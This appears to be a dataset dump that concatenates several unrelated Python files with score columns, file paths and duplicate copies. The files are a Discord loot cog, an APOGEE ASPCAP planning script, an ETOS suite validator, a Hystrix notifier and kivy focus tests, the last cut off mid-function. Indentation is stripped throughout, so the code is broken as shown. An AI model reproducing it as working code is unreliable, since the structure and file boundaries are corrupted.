loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
players = "\n".join(list(loot[name].keys()))
gold = "\n".join(str(x) for x in list(loot[name].values()))
embed = discord.Embed(color=6465603)
embed.set_author(name=name)
embed.add_field(name="__Players__", value=players)
embed.add_field(name="__Price Paid__", value=gold)
await ctx.send(embed=embed)
@loot.command(pass_context=True)
async def list(self, ctx):
"""Shows existing loot in the current guild"""
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if len(loot) < 1:
await ctx.send(
"No items have been created for this guild yet, please create some using [p]item create"
" first, thanks"
)
return
items = loot.keys()
await ctx.send("Here are this guild's items:\n{}".format("\n".join(items)))
@loot.command(pass_context=True, hidden=True)
async def remove(self, ctx, name: str, char: str = None):
"""Deletes existing characters in an item or items"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot.keys():
await ctx.send(
"Please make sure that the name is spelled correctly and "
"that you can find it in [p]loot list"
)
return
if char is None:
del loot[name]
elif char in loot[name]:
del loot[name][char]
await ctx.send("{} has been removed".format(char if char else name))
await self._loot.guild(guild).set(loot) | 0.364099 | 0.145267 |
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import glob
import numpy as np
import os
import sys
import subprocess
import pdb
from apogee.plan import mkslurm
if __name__ == '__main__' :
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description='Creates ASPCAP directories and plan files')
parser.add_argument("apred",type=str, help='apred version')
parser.add_argument("aspcap",type=str,help='aspcap version')
parser.add_argument("config",type=str,help='aspcap configuration')
parser.add_argument("--apstar",type=str, help='apred version',default='stars')
parser.add_argument("--queue",type=int,default=0)
parser.add_argument("--ncpus",type=int,default=16)
parser.add_argument("--noplot",type=int,default=0)
parser.add_argument("--noelem",type=int,default=0)
parser.add_argument("--nstars",type=int,default=0)
parser.add_argument("--commiss",type=int,default=0)
parser.add_argument("--nored",type=int,default=0)
parser.add_argument("--visits",type=int,default=0)
parser.add_argument("--caldir",type=str,default='0')
parser.add_argument("--npar",type=int,default=0)
parser.add_argument("--renorm",type=int,default=0)
parser.add_argument("--maxwind",type=int,default=0)
parser.add_argument("--unitweight",type=int,default=0)
parser.add_argument("--minmjdlast",type=int,default=0)
parser.add_argument("--fields",type=str,nargs='+',help='list of fields',default=[])
args=parser.parse_args()
if len(args.fields) > 0 : nstars=np.zeros(len(args.fields),dtype=int)
for i,field in enumerate(args.fields) :
print('field: ', field)
cmd=["idl","-e","aspcap_mkplan,'"+field+"'"+
",apred_vers='{:s}'".format(args.apred)+
",apstar_vers='{:s}'".format(args.apstar)+
",aspcap_vers='{:s}'".format(args.aspcap)+
",aspcap_config='{:s}'".format(args.config)+
",ncpus={:d}".format(args.ncpus)+
",queue={:d}".format(args.queue)+
",noplot={:d}".format(args.noplot)+
",caldir='{:s}'".format(args.caldir)+
",noelem={:d}".format(args.noelem)+
",nstars={:d}".format(args.nstars)+
",commiss={:d}".format(args.commiss)+
",nored={:d}".format(args.nored)+
",visits={:d}".format(args.visits)+
",npar={:d}".format(args.npar)+
",minmjdlast={:d}".format(args.minmjdlast)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)]
print(cmd)
subprocess.call(cmd,shell=False)
nstars[i] = len(glob.glob(field+'/a?Star-*.fits'))
for inst in ['apogee-n','apogee-s'] :
outdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap+'/config/'+inst+'/'
cmd=["idl","-e","aspcap_mklib,'"+args.config+"'"+
",outdir='{:s}'".format(outdir)+
",apred='{:s}'".format(args.apred)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)+
",unitweight={:d}".format(args.unitweight)+
",inst='"+inst+"'"]
print(cmd)
subprocess.call(cmd,shell=False)
f=open(outdir+'/done','w')
f.close()
topdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap
os.chdir(topdir)
cmd='aspcap '
if args.noelem != 0 : cmd+=' --noelem'
mkslurm.write('"'+cmd+'" apo*/plan/aspcapStar*.par lco*/plan/aspcapStar*.par',maxrun=2,idlthreads=16,queryport=1051,queryhost=os.uname()[1])
sort=np.argsort(nstars)[::-1]
fp=open(topdir+'/slurm/fields.sort','w')
for i in range(len(sort)) :
tel=args.fields[sort[i]].split('/')[0]
field=args.fields[sort[i]].split('/')[1]
fp.write('{:s}/plan/aspcapStar-{:s}.par {:d}\n'.format(tel,field,nstars[sort[i]]))
fp.close()
print('Modify slurm/aspcap to use fields.sort if desired...') | bin/mkaspcap.py |
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import glob
import numpy as np
import os
import sys
import subprocess
import pdb
from apogee.plan import mkslurm
if __name__ == '__main__' :
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description='Creates ASPCAP directories and plan files')
parser.add_argument("apred",type=str, help='apred version')
parser.add_argument("aspcap",type=str,help='aspcap version')
parser.add_argument("config",type=str,help='aspcap configuration')
parser.add_argument("--apstar",type=str, help='apred version',default='stars')
parser.add_argument("--queue",type=int,default=0)
parser.add_argument("--ncpus",type=int,default=16)
parser.add_argument("--noplot",type=int,default=0)
parser.add_argument("--noelem",type=int,default=0)
parser.add_argument("--nstars",type=int,default=0)
parser.add_argument("--commiss",type=int,default=0)
parser.add_argument("--nored",type=int,default=0)
parser.add_argument("--visits",type=int,default=0)
parser.add_argument("--caldir",type=str,default='0')
parser.add_argument("--npar",type=int,default=0)
parser.add_argument("--renorm",type=int,default=0)
parser.add_argument("--maxwind",type=int,default=0)
parser.add_argument("--unitweight",type=int,default=0)
parser.add_argument("--minmjdlast",type=int,default=0)
parser.add_argument("--fields",type=str,nargs='+',help='list of fields',default=[])
args=parser.parse_args()
if len(args.fields) > 0 : nstars=np.zeros(len(args.fields),dtype=int)
for i,field in enumerate(args.fields) :
print('field: ', field)
cmd=["idl","-e","aspcap_mkplan,'"+field+"'"+
",apred_vers='{:s}'".format(args.apred)+
",apstar_vers='{:s}'".format(args.apstar)+
",aspcap_vers='{:s}'".format(args.aspcap)+
",aspcap_config='{:s}'".format(args.config)+
",ncpus={:d}".format(args.ncpus)+
",queue={:d}".format(args.queue)+
",noplot={:d}".format(args.noplot)+
",caldir='{:s}'".format(args.caldir)+
",noelem={:d}".format(args.noelem)+
",nstars={:d}".format(args.nstars)+
",commiss={:d}".format(args.commiss)+
",nored={:d}".format(args.nored)+
",visits={:d}".format(args.visits)+
",npar={:d}".format(args.npar)+
",minmjdlast={:d}".format(args.minmjdlast)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)]
print(cmd)
subprocess.call(cmd,shell=False)
nstars[i] = len(glob.glob(field+'/a?Star-*.fits'))
for inst in ['apogee-n','apogee-s'] :
outdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap+'/config/'+inst+'/'
cmd=["idl","-e","aspcap_mklib,'"+args.config+"'"+
",outdir='{:s}'".format(outdir)+
",apred='{:s}'".format(args.apred)+
",renorm={:d}".format(args.renorm)+
",maxwind={:d}".format(args.maxwind)+
",unitweight={:d}".format(args.unitweight)+
",inst='"+inst+"'"]
print(cmd)
subprocess.call(cmd,shell=False)
f=open(outdir+'/done','w')
f.close()
topdir=os.environ['APOGEE_ASPCAP']+'/'+args.apred+'/'+args.aspcap
os.chdir(topdir)
cmd='aspcap '
if args.noelem != 0 : cmd+=' --noelem'
mkslurm.write('"'+cmd+'" apo*/plan/aspcapStar*.par lco*/plan/aspcapStar*.par',maxrun=2,idlthreads=16,queryport=1051,queryhost=os.uname()[1])
sort=np.argsort(nstars)[::-1]
fp=open(topdir+'/slurm/fields.sort','w')
for i in range(len(sort)) :
tel=args.fields[sort[i]].split('/')[0]
field=args.fields[sort[i]].split('/')[1]
fp.write('{:s}/plan/aspcapStar-{:s}.par {:d}\n'.format(tel,field,nstars[sort[i]]))
fp.close()
print('Modify slurm/aspcap to use fields.sort if desired...') | 0.310799 | 0.049681 |
"""ETOS API suite validator module."""
import logging
from uuid import UUID
from typing import Union, List
from pydantic import BaseModel, validator, ValidationError, constr, conlist
import requests
class Environment(BaseModel):
"""ETOS suite definion 'ENVIRONMENT' constraint."""
key: str
value: dict
class Command(BaseModel):
"""ETOS suite definion 'COMMAND' constraint."""
key: str
value: constr(min_length=1)
class Checkout(BaseModel):
"""ETOS suite definion 'CHECKOUT' constraint."""
key: str
value: conlist(str, min_items=1)
class Parameters(BaseModel):
"""ETOS suite definion 'PARAMETERS' constraint."""
key: str
value: dict
class Execute(BaseModel):
"""ETOS suite definion 'EXECUTE' constraint."""
key: str
value: List[str]
class TestRunner(BaseModel):
"""ETOS suite definion 'TEST_RUNNER' constraint."""
key: str
value: constr(min_length=1)
class TestCase(BaseModel):
"""ETOS suite definion 'testCase' field."""
id: str
tracker: str
url: str
class Constraint(BaseModel):
"""ETOS suite definion 'constraints' field."""
key: str
value: Union[str, list, dict] # pylint:disable=unsubscriptable-object
class Recipe(BaseModel):
"""ETOS suite definion 'recipes' field."""
constraints: List[Constraint]
id: UUID
testCase: TestCase
__constraint_models = {
"ENVIRONMENT": Environment,
"COMMAND": Command,
"CHECKOUT": Checkout,
"PARAMETERS": Parameters,
"EXECUTE": Execute,
"TEST_RUNNER": TestRunner,
}
@validator("constraints")
def validate_constraints(
cls, value
): # Pydantic requires cls. pylint:disable=no-self-argument
"""Validate the constraints fields for each recipe.
Validation is done manually because error messages from pydantic
are not clear enough when using a Union check on the models.
Pydantic does not check the number of unions either, which is something
that is required for ETOS.
:raises ValueError: if there are too many or too few constraints.
:raises TypeError: If an unknown constraint is detected.
:raises ValidationError: If constraint model does not validate.
:param value: The current constraint that is being validated.
:type value: Any
:return: Same as value, if validated.
:rtype: Any
"""
count = dict.fromkeys(cls.__constraint_models.keys(), 0)
for constraint in value:
model = cls.__constraint_models.get(constraint.key)
if model is None:
raise TypeError(
"Unknown key %r, valid keys: %r"
% (constraint.key, tuple(cls.__constraint_models.keys()))
)
try:
model(**constraint.dict())
except ValidationError as exception:
raise ValueError(str(exception)) from exception
count[constraint.key] += 1
more_than_one = [key for key, number in count.items() if number > 1]
if more_than_one:
raise ValueError(
"Too many instances of keys %r. Only 1 allowed." % more_than_one
)
missing = [key for key, number in count.items() if number == 0]
if missing:
raise ValueError(
"Too few instances of keys %r. At least 1 required." % missing
)
return value
class Suite(BaseModel):
"""ETOS base suite definition."""
name: str
priority: int
recipes: List[Recipe]
class SuiteValidator: # pylint:disable=too-few-public-methods
"""Validate ETOS suite definitions to make sure they are executable."""
logger = logging.getLogger(__name__)
async def _download_suite(self, test_suite_url):
"""Attempt to download suite.
:param test_suite_url: URL to test suite to download.
:type test_suite_url: str
:return: Downloaded test suite as JSON.
:rtype: list
"""
try:
suite = requests.get(test_suite_url)
suite.raise_for_status()
except Exception as exception: # pylint:disable=broad-except
raise AssertionError(
"Unable to download suite from %r" % test_suite_url
) from exception
return suite.json()
async def validate(self, test_suite_url):
"""Validate the ETOS suite definition.
:param test_suite_url: URL to test suite that is being executed.
:type test_suite_url: str
:raises ValidationError: If the suite did not validate.
"""
downloaded_suite = await self._download_suite(test_suite_url)
for suite in downloaded_suite:
assert Suite(**suite) | src/etos_api/library/validator.py | """ETOS API suite validator module."""
import logging
from uuid import UUID
from typing import Union, List
from pydantic import BaseModel, validator, ValidationError, constr, conlist
import requests
class Environment(BaseModel):
"""ETOS suite definion 'ENVIRONMENT' constraint."""
key: str
value: dict
class Command(BaseModel):
"""ETOS suite definion 'COMMAND' constraint."""
key: str
value: constr(min_length=1)
class Checkout(BaseModel):
"""ETOS suite definion 'CHECKOUT' constraint."""
key: str
value: conlist(str, min_items=1)
class Parameters(BaseModel):
"""ETOS suite definion 'PARAMETERS' constraint."""
key: str
value: dict
class Execute(BaseModel):
"""ETOS suite definion 'EXECUTE' constraint."""
key: str
value: List[str]
class TestRunner(BaseModel):
"""ETOS suite definion 'TEST_RUNNER' constraint."""
key: str
value: constr(min_length=1)
class TestCase(BaseModel):
"""ETOS suite definion 'testCase' field."""
id: str
tracker: str
url: str
class Constraint(BaseModel):
"""ETOS suite definion 'constraints' field."""
key: str
value: Union[str, list, dict] # pylint:disable=unsubscriptable-object
class Recipe(BaseModel):
"""ETOS suite definion 'recipes' field."""
constraints: List[Constraint]
id: UUID
testCase: TestCase
__constraint_models = {
"ENVIRONMENT": Environment,
"COMMAND": Command,
"CHECKOUT": Checkout,
"PARAMETERS": Parameters,
"EXECUTE": Execute,
"TEST_RUNNER": TestRunner,
}
@validator("constraints")
def validate_constraints(
cls, value
): # Pydantic requires cls. pylint:disable=no-self-argument
"""Validate the constraints fields for each recipe.
Validation is done manually because error messages from pydantic
are not clear enough when using a Union check on the models.
Pydantic does not check the number of unions either, which is something
that is required for ETOS.
:raises ValueError: if there are too many or too few constraints.
:raises TypeError: If an unknown constraint is detected.
:raises ValidationError: If constraint model does not validate.
:param value: The current constraint that is being validated.
:type value: Any
:return: Same as value, if validated.
:rtype: Any
"""
count = dict.fromkeys(cls.__constraint_models.keys(), 0)
for constraint in value:
model = cls.__constraint_models.get(constraint.key)
if model is None:
raise TypeError(
"Unknown key %r, valid keys: %r"
% (constraint.key, tuple(cls.__constraint_models.keys()))
)
try:
model(**constraint.dict())
except ValidationError as exception:
raise ValueError(str(exception)) from exception
count[constraint.key] += 1
more_than_one = [key for key, number in count.items() if number > 1]
if more_than_one:
raise ValueError(
"Too many instances of keys %r. Only 1 allowed." % more_than_one
)
missing = [key for key, number in count.items() if number == 0]
if missing:
raise ValueError(
"Too few instances of keys %r. At least 1 required." % missing
)
return value
class Suite(BaseModel):
"""ETOS base suite definition."""
name: str
priority: int
recipes: List[Recipe]
class SuiteValidator: # pylint:disable=too-few-public-methods
"""Validate ETOS suite definitions to make sure they are executable."""
logger = logging.getLogger(__name__)
async def _download_suite(self, test_suite_url):
"""Attempt to download suite.
:param test_suite_url: URL to test suite to download.
:type test_suite_url: str
:return: Downloaded test suite as JSON.
:rtype: list
"""
try:
suite = requests.get(test_suite_url)
suite.raise_for_status()
except Exception as exception: # pylint:disable=broad-except
raise AssertionError(
"Unable to download suite from %r" % test_suite_url
) from exception
return suite.json()
async def validate(self, test_suite_url):
"""Validate the ETOS suite definition.
:param test_suite_url: URL to test suite that is being executed.
:type test_suite_url: str
:raises ValidationError: If the suite did not validate.
"""
downloaded_suite = await self._download_suite(test_suite_url)
for suite in downloaded_suite:
assert Suite(**suite) | 0.925048 | 0.310917 |
from __future__ import absolute_import
import logging
log = logging.getLogger(__name__)
class AbstractBaseEventNotifier(object):
""" Abstract base EventNotifier that allows receiving notifications for
different events with default implementations.
See :class:`hystrix.strategy.plugins.Plugin` or the Hystrix GitHub Wiki
for information on `configuring plugins
<https://github.com/Netflix/Hystrix/wiki/Plugins>`_.
.. note::
Note on thread-safety and performance
A single implementation of this class will be used globally so methods
on this class will be invoked concurrently from multiple threads so
all functionality must be thread-safe.
Methods are also invoked synchronously and will add to execution time
of the commands so all behavior should be fast. If anything
time-consuming is to be done it should be spawned asynchronously
onto separate worker threads.
"""
def mark_event(self, event_type, command_name):
""" Called for every event fired.
This is the default Implementation and does nothing
Args:
event_type: A :class:hystrix.event_type.EventType` occurred
during execution.
command_key: Command instance name.
"""
# Do nothing
pass
def mark_command_execution(self, command_name, isolation_strategy, duration, events_type):
""" Called after a command is executed using thread isolation.
Will not get called if a command is rejected, short-circuited etc.
This is the default Implementation and does nothing
Args:
command_key: Command instance name.
isolation_strategy: :class:`ExecutionIsolationStrategy` the
isolation strategy used by the command when executed
duration: Time in milliseconds of executing
:meth:`hystrix.command.Command.run()` method.
events_type: A list of :class:hystrix.event_type.EventType` of events
occurred during execution.
"""
# Do nothing
pass | hystrix/strategy/eventnotifier/event_notifier.py | from __future__ import absolute_import
import logging
log = logging.getLogger(__name__)
class AbstractBaseEventNotifier(object):
""" Abstract base EventNotifier that allows receiving notifications for
different events with default implementations.
See :class:`hystrix.strategy.plugins.Plugin` or the Hystrix GitHub Wiki
for information on `configuring plugins
<https://github.com/Netflix/Hystrix/wiki/Plugins>`_.
.. note::
Note on thread-safety and performance
A single implementation of this class will be used globally so methods
on this class will be invoked concurrently from multiple threads so
all functionality must be thread-safe.
Methods are also invoked synchronously and will add to execution time
of the commands so all behavior should be fast. If anything
time-consuming is to be done it should be spawned asynchronously
onto separate worker threads.
"""
def mark_event(self, event_type, command_name):
""" Called for every event fired.
This is the default Implementation and does nothing
Args:
event_type: A :class:hystrix.event_type.EventType` occurred
during execution.
command_key: Command instance name.
"""
# Do nothing
pass
def mark_command_execution(self, command_name, isolation_strategy, duration, events_type):
""" Called after a command is executed using thread isolation.
Will not get called if a command is rejected, short-circuited etc.
This is the default Implementation and does nothing
Args:
command_key: Command instance name.
isolation_strategy: :class:`ExecutionIsolationStrategy` the
isolation strategy used by the command when executed
duration: Time in milliseconds of executing
:meth:`hystrix.command.Command.run()` method.
events_type: A list of :class:hystrix.event_type.EventType` of events
occurred during execution.
"""
# Do nothing
pass | 0.897819 | 0.161585 |
import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.scrollview import ScrollView
from kivy.uix.textinput import TextInput
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.uix.treeview import TreeViewLabel
import pytest
from math import isclose
from common import run_in_app
from kivy_garden.advancedfocusbehavior import *
def default_container():
    """Build the standard vertical FocusBoxLayout used as a fixture by most tests."""
    layout = FocusBoxLayout(orientation='vertical', padding=30, spacing=30)
    return layout
class CheckActionApp(App):
    """Test app that passes only if ``did_action`` was set before it stopped."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Set to True by a test callback once the expected user action happened.
        self.did_action = False

    def stop(self):
        # Stop the app first, then let the assert fail the surrounding
        # pytest test if the expected action never happened.
        super().stop()
        assert self.did_action
class CheckFocusActionApp(FocusApp):
    """FocusApp variant of ``CheckActionApp``: fails unless ``did_action`` was set.

    Used by tests that need the FocusApp base (e.g. recovering focus when
    nothing is focused) rather than the plain kivy App.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Set to True by a test callback once the expected user action happened.
        self.did_action = False

    def stop(self):
        # Stop first, then assert so pytest reports a failure if the
        # action never happened.
        super().stop()
        assert self.did_action
# TODO: move to different file
@run_in_app(app_class=CheckActionApp)
def test_focus_buttons():
    """A lone FocusButton should auto-focus and be activatable with Enter."""
    app = App.get_running_app()
    # NOTE: removed dead assignment `self = test_focus_buttons` -- it was
    # never read anywhere in the function.

    def push_me(*args):
        # Mark the test as passed, then shut the app down.
        app.did_action = True
        app.stop()

    container = FocusBoxLayout()
    btn = FocusButton(text='Press Enter', on_press=push_me)
    container.add_widget(btn)
    app.root.add_widget(container)
    # The only focusable widget should have received focus automatically.
    assert btn.focus
    return True
@run_in_app(app_class=CheckActionApp)
def test_cycle_through_focusables():
    """Tab forward one widget, then Shift+Tab back; reaching button 3 fails."""
    app = App.get_running_app()
    app.step_1 = False

    def on_focus_first(_btn, focused):
        # Regaining focus after step 1 means Shift+Tab cycled back correctly.
        if focused and app.step_1:
            app.did_action = True
            app.stop()

    def on_focus_second(_btn, focused):
        if not focused:
            return
        if app.step_1:
            # Focused a second time: the tester tabbed the wrong way -- fail.
            app.stop()
        else:
            app.step_1 = True

    def on_focus_third(_btn, focused):
        # Landing on button 3 at all is a failure.
        if focused:
            app.stop()

    container = default_container()
    container.add_widget(Label(text=('Press Tab once to cycle to the next widget, '
                                     'then press Shift+Tab once to cycle back.')))
    buttons = [FocusButton(text='button 1'),
               FocusButton(text='button 2'),
               FocusButton(text='button 3')]
    handlers = (on_focus_first, on_focus_second, on_focus_third)
    for btn, handler in zip(buttons, handlers):
        btn.bind(focus=handler)
        container.add_widget(btn)
    app.root.add_widget(container)
    # The first focusable widget starts focused.
    assert buttons[0].focus
    return True
@run_in_app(app_class=CheckFocusActionApp, timeout=15)
def test_focus_from_nothing():
    """Keyboard focus must be recoverable when no widget starts focused."""
    app = App.get_running_app()
    container = default_container()
    container.add_widget(Label(text='Press any button'))

    def on_press(*args):
        app.did_action = True
        app.stop()

    for _ in range(5):
        container.add_widget(FocusButton(text='Press me', on_press=on_press))

    # Explicitly clear focus on every focusable child so the tester
    # starts the app with nothing focused.
    for child in container.children:
        if hasattr(child, 'focus'):
            child.focus = False

    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_carousel():
    """Focus must reach a widget inside a carousel slide after navigating to it."""
    app = App.get_running_app()
    app.step_1 = False

    def first_pressed(*args):
        app.step_1 = True

    def second_pressed(*args):
        # Only counts if the button inside the carousel was reached first.
        if app.step_1:
            app.did_action = True
            app.stop()

    carousel = FocusCarousel(direction='right')
    carousel.add_widget(Label(text='Navigate to the right in the carousel'))

    slide = default_container()
    inside_btn = FocusButton(text='Press me')
    inside_btn.bind(on_press=first_pressed)
    slide.add_widget(inside_btn)
    carousel.add_widget(slide)

    outside_btn = FocusButton(text='Press me after you\'ve pressed the other button')
    outside_btn.bind(on_press=second_pressed)

    app.root.add_widget(carousel)
    app.root.add_widget(outside_btn)
    return True
@run_in_app(app_class=CheckActionApp)
def test_checkbox():
    """The checkbox must be toggled on via keyboard before the submit press."""
    app = App.get_running_app()
    container = default_container()

    checkbox = FocusCheckBox()

    def on_submit(*args):
        # Fails the test if the checkbox was never activated.
        assert checkbox.active
        app.did_action = True
        app.stop()

    submit = FocusButton(text='Test checkbox')
    submit.bind(on_press=on_submit)

    container.add_widget(Label(text='Activate the checkbox, then press the button below it.'))
    container.add_widget(checkbox)
    container.add_widget(submit)
    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp)
def test_toggle_button():
    """The toggle button must be switched to 'down' before the submit press."""
    app = App.get_running_app()
    container = default_container()

    toggle = FocusToggleButton(text='off')

    def sync_caption(button, state):
        # Mirror the toggle state in the button's caption.
        button.text = 'on' if state == 'down' else 'off'

    def on_submit(*args):
        assert toggle.state == 'down'
        app.did_action = True
        app.stop()

    submit = FocusButton(text='Test toggle button')
    toggle.bind(state=sync_caption)
    submit.bind(on_press=on_submit)

    for widget in (Label(text='Activate the toggle button, then press the button below it.'),
                   toggle, submit):
        container.add_widget(widget)
    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp)
def test_slider():
    """The slider must be moved to the target value via the keyboard."""
    target = 48
    app = App.get_running_app()
    container = default_container()

    position_label = Label()
    slider = FocusSlider()

    def show_position(_slider, new_value):
        # Keep the numeric readout in sync with the slider position.
        position_label.text = str(int(new_value))

    def on_submit(*args):
        assert int(slider.value) == target
        app.did_action = True
        app.stop()

    slider.bind(value=show_position)
    submit = FocusButton(text='Submit')
    submit.bind(on_press=on_submit)

    for widget in (Label(text=f'Set the slider to {target}'),
                   position_label, slider, submit):
        container.add_widget(widget)
    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp)
def test_screen_manager():
    """Focus must work across screen switches in a FocusScreenManager.

    The tester presses a button on screen 1 (which switches to screen 2),
    presses the button there, then presses a submit button that lives
    outside the manager; the test passes only if the screen-2 button was
    actually pressed first.
    """
    app = App.get_running_app()
    # Tracks whether the button on screen 2 was pressed.
    app.step_1 = False
    instructions = Label(text=('Press the button on the next screen, then press'
                               ' the button at the bottom of the app.'))
    s1 = FocusScreen(name='screen_1')
    container_1 = default_container()
    to_screen_2 = FocusButton(text='To screen 2 ->')
    container_1.add_widget(to_screen_2)
    s1.add_widget(container_1)
    s2 = FocusScreen(name='screen_2')
    container_2 = default_container()
    step_1_btn = FocusButton(text='Press me first!')
    container_2.add_widget(step_1_btn)
    s2.add_widget(container_2)
    submit_btn = FocusButton(text='Submit')
    manager = FocusScreenManager()
    def press_step_1(*args):
        app.step_1 = True
    def press_to_screen_2(*args):
        # Switch the manager to the second screen by name.
        manager.current = 'screen_2'
    def submit(*args):
        # Only passes if the screen-2 button was pressed beforehand.
        if app.step_1:
            app.did_action = True
            app.stop()
    to_screen_2.bind(on_press=press_to_screen_2)
    step_1_btn.bind(on_press=press_step_1)
    submit_btn.bind(on_press=submit)
    manager.add_widget(s1)
    manager.add_widget(s2)
    app.root.add_widget(instructions)
    app.root.add_widget(manager)
    app.root.add_widget(submit_btn)
    return True
@run_in_app(app_class=CheckActionApp, timeout=60)
def test_video_player():
    """Seek the video player to the target time and mute it, then submit."""
    target = 5  # seconds
    app = App.get_running_app()
    container = default_container()

    player = FocusVideoPlayer(source='tests/actual/test_data/mandelbrot.mp4')

    def on_submit(*args):
        # Allow one second of slack on the seek position.
        assert isclose(target, player.position, abs_tol=1)
        assert player.volume == 0
        app.did_action = True
        app.stop()

    submit = FocusButton(text='Submit', size_hint_y=0.1)
    submit.bind(on_press=on_submit)

    container.add_widget(Label(text=(f'1. Navigate to {target} seconds in the video\n'
                                     '2. Mute the audio'), size_hint_y=0.1))
    container.add_widget(player)
    container.add_widget(submit)
    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp)
def test_tabbed_panel():
    """Focus must move into another tab of a FocusTabbedPanel.

    The tester switches to the second tab, presses the button there,
    then presses Submit; pressing the decoy button on the first tab
    stops the app without setting ``did_action`` and so fails the test.
    """
    app = App.get_running_app()
    # Tracks whether the button on the second tab was pressed.
    app.step_1 = False
    container = default_container()
    instructions = Label(text='Press the button on the next tab, then press Submit.')
    tab_btn = FocusButton(text='Press me first')
    submit_btn = FocusButton(text='Submit', size_hint_y=0.1)
    inner_container = default_container()
    ignore_btn = FocusButton(text='Ignore me')
    inner_container.add_widget(instructions)
    inner_container.add_widget(ignore_btn)
    tp = FocusTabbedPanel()
    # The default tab shows the instructions plus the decoy button.
    tp.default_tab_content = inner_container
    item = TabbedPanelItem(text='Go here')
    item.add_widget(tab_btn)
    tp.add_widget(item)
    def press_ignore(*args):  # Auto fail
        app.stop()
    def press_step_1(*args):
        app.step_1 = True
    def submit(*args):
        # Only passes if the second-tab button was pressed beforehand.
        if app.step_1:
            app.did_action = True
            app.stop()
    ignore_btn.bind(on_press=press_ignore)
    tab_btn.bind(on_press=press_step_1)
    submit_btn.bind(on_press=submit)
    container.add_widget(tp)
    container.add_widget(submit_btn)
    app.root.add_widget(container)
    return True
@run_in_app(app_class=CheckActionApp)
def test_modal_view():
    """Focus must return to the underlying layout after a modal is dismissed."""
    app = App.get_running_app()
    container = default_container()

    def open_modal(*args):
        # focus_return sends keyboard focus back to `container` on dismiss.
        modal = FocusModalView(focus_return=container, auto_dismiss=False,
                               size_hint=(0.5, 0.5))
        closer = FocusButton(text='Dismiss this modal',
                             on_press=lambda _btn: modal.dismiss())
        modal.add_widget(closer)
        modal.open()

    def finish(*args):
        app.did_action = True
        app.stop()

    container.add_widget(FocusButton(text='Press this after dismissing the modal view',
                                     on_press=finish))
    app.root.add_widget(container)
    # Open the modal once the widget tree is built.
    Clock.schedule_once(open_modal)
    return True
@run_in_app(app_class=CheckActionApp)
def test_popup():
    """Focus must return to the main layout after a popup is dismissed."""
    app = App.get_running_app()
    container = default_container()

    def open_popup(*args):
        body = default_container()
        closer = FocusButton(text='Dismiss this popup')
        # focus_return sends keyboard focus back to `container` on dismiss.
        popup = FocusPopup(title='Popup', content=body, focus_return=container,
                           auto_dismiss=False, size_hint=(0.5, 0.5))
        closer.bind(on_press=lambda *_: popup.dismiss())
        body.add_widget(closer)
        popup.open()

    def finish(*args):
        app.did_action = True
        app.stop()

    container.add_widget(FocusButton(text='Press this after dismissing the popup',
                                     on_press=finish))
    app.root.add_widget(container)
    # Open the popup once the widget tree is built.
    Clock.schedule_once(open_popup)
    return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_accordion():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Navigate to the next accordion section.')
step_1_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Press me second')
container_1 = default_container()
container_1.add_widget(instructions)
container_2 = default_container()
container_2.add_widget(step_1_btn)
acc = FocusAccordion()
item_1 = FocusAccordionItem()
item_1.add_widget(container_1)
acc.add_widget(item_1)
item_2 = FocusAccordionItem()
item_2.add_widget(container_2)
acc.add_widget(item_2)
acc.select(item_1)
container = default_container()
container.add_widget(acc)
container.add_widget(submit_btn)
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
step_1_btn.bind(on_press=step_1)
submit_btn.bind(on_press=submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_scroll_view():
app = App.get_running_app()
instructions = Label(text='Look through the scroll area to find the correct button to press.', size_hint_y=0.1)
correct_button = 'Button 3'
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
scroll_container.add_widget(Label(text=correct_button))
button_container = FocusBoxLayout(orientation='horizontal', padding=10, spacing=10, size_hint_y=0.15)
def guess(btn, *args):
if btn.text == correct_button:
app.did_action = True
app.stop()
for i in range(5):
btn = FocusButton(text=f'Button {i}')
btn.bind(on_press=guess)
button_container.add_widget(btn)
container = default_container()
sv = FocusScrollView()
sv.add_widget(scroll_container)
for widg in (instructions, sv, button_container):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_focus_scroll_into_view():
app = App.get_running_app()
instructions = Label(text='Press the button within the ScrollView (by tabbing to it)')
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
def press(*args):
